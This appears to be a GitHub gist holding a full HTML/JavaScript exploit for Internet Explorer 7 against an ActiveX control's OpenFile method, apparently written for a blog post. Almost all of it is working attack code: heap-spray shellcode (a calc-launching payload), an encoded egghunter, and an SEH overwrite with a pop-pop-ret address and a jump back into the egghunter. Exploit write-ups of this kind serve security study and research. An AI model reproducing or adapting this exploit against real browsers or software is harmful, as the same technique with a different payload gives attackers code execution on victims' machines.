Internet Explorer 7 RSP Exploit for blogpost
<!DOCTYPE html> | |
<html> | |
<head> | |
<title> Exploit for IE 7 </title> | |
<object id="VULNERABLE" classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687'></object> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
function allocateShellcode(){ | |
var eggTag = "%u3077%u7430"; | |
var msfShellcode = "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100"; | |
var shellcode = unescape(eggTag + eggTag + msfShellcode) | |
var myArray = []; | |
for (x = 0; x < 500; x++){ | |
myArray[x] = shellcode; | |
} | |
} | |
var crash = ""; | |
junk_size = 644; | |
size = 1000; | |
var eggHunter = unescape( | |
"%54%5a%d9%eb%d9%72%f4%5f%57%59%49%49%49%49%49" + | |
"%49%49%49%49%49%43%43%43%43%43%43%37%51%5a%6a" + | |
"%41%58%50%30%41%30%41%6b%41%41%51%32%41%42%32" + | |
"%42%42%30%42%42%41%42%58%50%38%41%42%75%4a%49" + | |
"%62%46%4e%61%6b%7a%6b%4f%64%4f%30%42%32%72%43" + | |
"%5a%44%42%42%78%68%4d%56%4e%37%4c%57%75%61%4a" + | |
"%44%34%78%6f%48%38%74%37%74%70%34%70%72%54%6f" + | |
"%79%5a%77%6e%4f%53%45%6a%4a%6e%4f%61%65%4a%47" + | |
"%69%6f%68%67%41%41" | |
); | |
for(x=0;x<junk_size-eggHunter.length;x++){ | |
crash += unescape("%90"); | |
} | |
crash += eggHunter; | |
nSEH = '%90%90%EB%07'; // JMP SHORT | |
SEH = '%35%60%6D%74'; // 746D6035 pop pop ret address | |
jmpBack = '%E9%37%FF%FF%FF'; // JMP Back to the egghunter | |
crash += unescape(nSEH); | |
crash += unescape(SEH); | |
for(x=0;x<10;x++){ | |
crash += unescape("%90");//Print 10 NOPs | |
} | |
crash += unescape(jmpBack); | |
for(x=0;x<size - junk_size - 4 - 4 - jmpBack.length - 10;x++){ | |
crash += unescape("%44"); | |
} | |
allocateShellcode(); | |
VULNERABLE.OpenFile(crash); | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment